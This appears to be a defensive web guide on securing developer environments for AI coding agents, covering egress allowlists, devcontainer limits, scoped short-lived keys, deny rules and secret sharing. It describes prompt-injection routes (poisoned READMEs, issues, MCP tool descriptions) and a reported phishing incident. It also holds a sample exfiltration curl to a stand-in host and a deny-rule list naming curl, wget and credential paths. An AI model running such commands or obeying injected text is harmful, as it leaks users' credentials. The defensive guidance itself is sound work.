Can an AI coding agent leak my secrets?

Yes. An agent carries your privileges — API keys, a logged-in gh, the cloud credential chain — and takes instructions from text it cannot fully trust (a dependency README, a GitHub issue, a fetched web page, a poisoned MCP tool description). A successful prompt injection turns that into an action: a curl with your ~/.aws credentials in the body, or a tool call to a key it was never meant to touch. OWASP ranks prompt injection as LLM01, the top risk for LLM applications. The defense that holds is the environment — egress controls and filesystem boundaries — not the model.

How should I scope API keys for an AI coding agent?

Scope to the task, not the operator role. A human may have read-write on the whole database; an agent running a report needs SELECT on two tables, enforced at the engine. Prefer short-lived tokens (OIDC, STS, gh app tokens) that expire in minutes, so a stolen token is often dead before it can be used. The strongest pattern keeps the credential out of the agent entirely: a proxy outside its trust boundary injects the key into requests, so there is no secret in the agent’s environment to exfiltrate.

What is the most effective control against secret exfiltration?

Egress control. Exfiltration needs a network path out, so blocking all outbound traffic except an allowlist (model inference, source control, package registries, telemetry) means a coerced curl to an attacker host simply never connects. Anthropic’s reference dev container ships an init-firewall.sh that does exactly this. Audit the allowlist like IAM — if it includes a host an attacker can write to (a public gist, a webhook tester), exfiltration still has a road out.

Does least privilege stop prompt injection?

No. Least privilege and scoped credentials bound the blast radius of a successful injection — they limit what a compromised agent can reach — but an injected instruction that stays inside the agent’s allowed scope still executes. None of these controls prevent injection from occurring. That is why the OWASP AI Agent cheat sheet lists nine controls: pair least privilege with deny rules, runtime authorization outside the model’s reasoning loop, input validation, and monitoring.

How do I share an .env file with an agent or teammate without leaking it?

Avoid channels that keep a copy — Slack, email, and tickets sit in searchable archives forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel like send.env.dev: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. A secret that exists in one place for one read cannot be scraped from a chat log.

Securing Your Dev Environment for AI Coding Agents

Q: Is a devcontainer a security boundary?

It is isolation, not a complete boundary. A dev container runs the agent as a non-root user and confines execution, which is the right baseline. But Anthropic’s own dev container docs warn that with --dangerously-skip-permissions it "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." Only run trusted repositories this way, never mount host secrets like ~/.ssh or cloud credential files, and use a disposable VM for genuinely hostile input.

Treat your AI coding agent as an untrusted intern: scope and expire API keys, lock down Docker egress, and assume prompt injection will exfiltrate secrets.

Securing a dev environment for an AI coding agent comes down to one assumption: treat the agent as an untrusted intern with your shell. It is useful, fast, and occasionally talked into doing something stupid by text it read in a file, an issue comment, or a web page. A successful prompt injection does not produce a rude sentence — it produces an action: a curl with your ~/.aws credentials in the body, a git push of a branch you never reviewed, a tool call to an API key it was never supposed to touch. The control that survives all of that is not the model. It is the environment.

Anthropic put the principle bluntly in its May 2026 post How we contain Claude, after an attacker phished an employee into running Claude Code with instructions to exfiltrate AWS keys: "the only defense that holds… is the environment, specifically egress controls that block the POST regardless of intent and filesystem boundaries that keep ~/.aws out of reach in the first place." This guide is the practical version of that sentence — scoped keys, locked-down Docker egress, devcontainer caveats, and how to hand secrets around without leaving a copy where an agent can read it.

TL;DR

Egress control is the one defense to set up first. If the agent cannot POST to an arbitrary host, the stolen secret has nowhere to go — block outbound traffic except an allowlist.
A devcontainer is isolation, not a complete boundary. Anthropic's own docs warn that with --dangerously-skip-permissions it "does not prevent a malicious project from exfiltrating anything accessible inside the container."
Scope keys to the task, not the operator. Prefer short-lived, narrowly scoped tokens; the agent should never hold a credential broader than the job in front of it.
Never mount host secrets. Keep ~/.ssh and cloud credential files out of the container; pass repository-scoped or expiring tokens instead.
Least privilege bounds the blast radius; it does not stop injection. Pair it with deny rules, runtime approval for risky actions, and monitoring.

What is the actual threat from an AI coding agent?

The structural problem is the confused deputy: the agent acts on your behalf and carries your privileges — API keys, a logged-in gh, a cloud credential chain — while taking instructions from text it cannot fully trust. OWASP ranks prompt injection as LLM01, the number-one risk for LLM applications, precisely because the injected instruction borrows the deputy's permissions. The blast radius is whatever the agent can reach: every tool loaded into its context is a callable endpoint, and every readable secret is a candidate for exfiltration.

Two things make this concrete rather than hypothetical. First, the injection source is rarely the user — it is a dependency's README, a GitHub issue the agent was asked to triage, a web page it fetched, or a poisoned MCP tool description. Second, the harm is a normal-looking action. Anthropic's containment team describes the case where the user themselves was the injection vector — phished into pasting malicious instructions — and notes that model-layer defenses cannot help once the human in the loop is the one being manipulated. That is the moment the environment has to catch it.

Why isn't a devcontainer a complete security boundary?

A dev container is the right baseline — it runs the agent as a non-root user, confines command execution to the container, and keeps your host toolchain out of reach. It is genuinely useful isolation. It is not a sandbox you can hand an untrusted repo and walk away from.

Anthropic's dev container documentation states the limit directly: run Claude Code with --dangerously-skip-permissions and the container "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." The same page gives the two rules that matter most:

Only develop trusted repositories this way, and monitor what the agent does — the container shrinks the blast radius, it does not neutralise a hostile project.
Never mount host secrets. Keep ~/.ssh and cloud credential files on the host; pass repository-scoped or short-lived tokens through containerEnv or a secrets store instead. A credential you mount is a credential the agent — and anything that injects it — can read.

How do I scope and expire API keys for an agent?

The rule that comes out of every agent-security writeup: scope permissions to the task, not to the operator's role. A human engineer might have read-write on the whole database; an agent running a report needs SELECT on two tables and nothing else, enforced at the engine, not requested politely in a prompt. The same logic applies to every key you hand it. See the environment variable security guide for the full secrets hierarchy and rotation playbook, and environment variable best practices for least-privilege defaults.

Three patterns, in order of strength:

Pattern	What it does	Why it limits exfiltration
Scoped key	One key per task, minimum permissions, separate per environment.	A leaked key buys the attacker only what that task could already do.
Short-lived token	Mint on demand, expire in minutes (OIDC, STS, `gh` app tokens).	A stolen token is often dead before the attacker can use it.
Credential never reaches the agent	A proxy outside the agent's trust boundary injects the key into requests.	There is no secret in the agent's environment to exfiltrate at all.

The third pattern is the one Anthropic ships in its own product surface: Claude Code's Remote Control uses "multiple short-lived, narrowly scoped credentials, each limited to a specific purpose and expiring independently, to limit the blast radius of any single compromised credential." You can apply the cheaper version today — keep the long-lived key in your CI secret store or a vault, hand the agent an expiring token, and rotate aggressively. A key that lives in a plaintext .env for six months is the worst case; a token that dies in fifteen minutes is the goal.

How do I lock down Docker egress and the filesystem?

Egress control is the defense that holds when everything else fails, because exfiltration needs a network path out. Anthropic's reference dev container ships an init-firewall.sh that blocks all outbound traffic except the domains the agent and your tools actually need — model inference, source control, package registries, telemetry. Everything else is dropped, so a coerced curl https://evil.example/?key=$AWS_SECRET simply never connects.

Pair that with two filesystem and permission controls. Claude Code restricts writes to the working directory and its subfolders by default, and its built-in sandbox (bubblewrap on Linux, seatbelt on macOS) enforces filesystem and network isolation on Bash — Anthropic reports it cut permission prompts by 84% in internal use precisely because the boundary, not a human click, is doing the work. On top of that, deny rules are a cheap, explicit backstop:

.claude/settings.json — deny secrets and arbitrary egress

{
  "permissions": {
    "deny": [
      "Read(./secrets/**)",
      "Read(./.env)",
      "Read(~/.aws/**)",
      "Read(~/.ssh/**)",
      "Bash(curl:*)",
      "Bash(wget:*)",
      "WebFetch"
    ]
  }
}

One honest caveat from Anthropic's docs: curl and wget are already not auto-approved, but a deny rule is what makes the block unconditional. And a TLS-terminating proxy is the only way to inspect or strip credentials from HTTPS traffic — a plain HTTP_PROXY sees an opaque tunnel, not the request body. For anything you truly do not trust, the strongest answer in the security docs is still a disposable VM.

How do I share secrets without leaving a copy?

Onboarding and credential handoff are where secrets leak by habit — pasted into Slack, emailed, dropped in a ticket, then sitting in a searchable archive forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel instead. That is exactly what send.env.dev is for: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. The sharing .env files securely guide covers the full workflow and how it compares to 1Password, Doppler, and SOPS. The rule of thumb: a secret that exists in exactly one place for exactly one read cannot be scraped from a chat log.

A hardening checklist for AI-assisted development

Run an agent against work you do not fully trust only when every line below is true. Most of these are one-time setup; the payoff is that a single bad instruction stays contained.

Non-root user, working directory only. The agent writes to the repo bind-mount and nothing above it.
No host secrets mounted. No ~/.ssh, no ~/.aws, no cloud credential files — repository-scoped or expiring tokens only.
Egress allowlist. Outbound blocked except inference, source control, registries, and telemetry.
Deny rules for secrets and network shells. Block reads of secret paths and unconditioned curl/wget.
Human-in-the-loop for high-risk actions. Deletes, deploys, infra changes, and pushes to main require explicit approval.
No unattended push to production. A non-interactive job must not push to main, publish packages, apply infra, or run migrations without a separate approval path.
Monitoring and audit. Log tool calls and watch for anomalous network or filesystem activity — observability is the OWASP control most teams skip.

When does this approach fall short?

Scoped keys do not stop injection — they cap it. An injected instruction that stays inside the agent's allowed scope still executes. Least privilege shrinks the damage; it does not prevent the act.
Containers are isolation, not a verdict. A privileged process outside the sandbox decides per-command whether to enforce it, and a persuasive injected prompt or a fatigued approval click can still get something through. Use a disposable VM for genuinely hostile input.
An allowlist is only as tight as its entries. If your egress allowlist includes a host an attacker can write to — a public gist, a webhook tester, your own telemetry sink — exfiltration has a road out. Audit the allowlist like you audit IAM.
Defense-in-depth or nothing. No single layer is sufficient. Runtime authorization that lives outside the model's reasoning loop, input validation, and monitoring are the rest of the stack — the OWASP cheat sheet lists nine controls for a reason.

Primary sources

Anthropic — How we contain Claude (May 2026; the egress-and-filesystem "defense that holds" framing and the user-as-injection-vector incident).
Anthropic — Claude Code sandboxing (filesystem + network isolation, bubblewrap/seatbelt, the 84% prompt reduction).
Claude Code — Development containers (the "not a complete boundary" warning, no-host-secrets rule, init-firewall.sh).
Claude Code — Security (read-only default, deny rules, network-command approval, scoped short-lived credentials).
OWASP — AI Agent Security Cheat Sheet (least privilege, tool scoping, runtime authorization, human-in-the-loop, monitoring).

Securing Your Dev Environment for AI Coding Agents

What is the actual threat from an AI coding agent?

Why isn't a devcontainer a complete security boundary?

How do I scope and expire API keys for an agent?

How do I lock down Docker egress and the filesystem?

How do I share secrets without leaving a copy?

A hardening checklist for AI-assisted development

When does this approach fall short?

Related reading on env.dev

Primary sources

Keep Reading

AI Dark Factory Part 5: Security & Governance

Dev Containers: Guide to Containerized Development

How to Share .env Files With Your Team Securely

MCP Server Environment Variables & Secrets

Frequently Asked Questions

Can an AI coding agent leak my secrets?

Is a devcontainer a security boundary?

How should I scope API keys for an AI coding agent?

What is the most effective control against secret exfiltration?

Does least privilege stop prompt injection?

How do I share an .env file with an agent or teammate without leaking it?

Stay up to date

Related Guides

Env Variables Security: Secrets, Leaks & Best Practices

Google Maps API Key Gemini Abuse: Stop Surprise Bills

AI Dark Factory Part 4: Scaling Agentic Coding

Related Tools

JWT Generator

HTTP Header Analyzer

Related Cheatsheets

SSH Cheat Sheet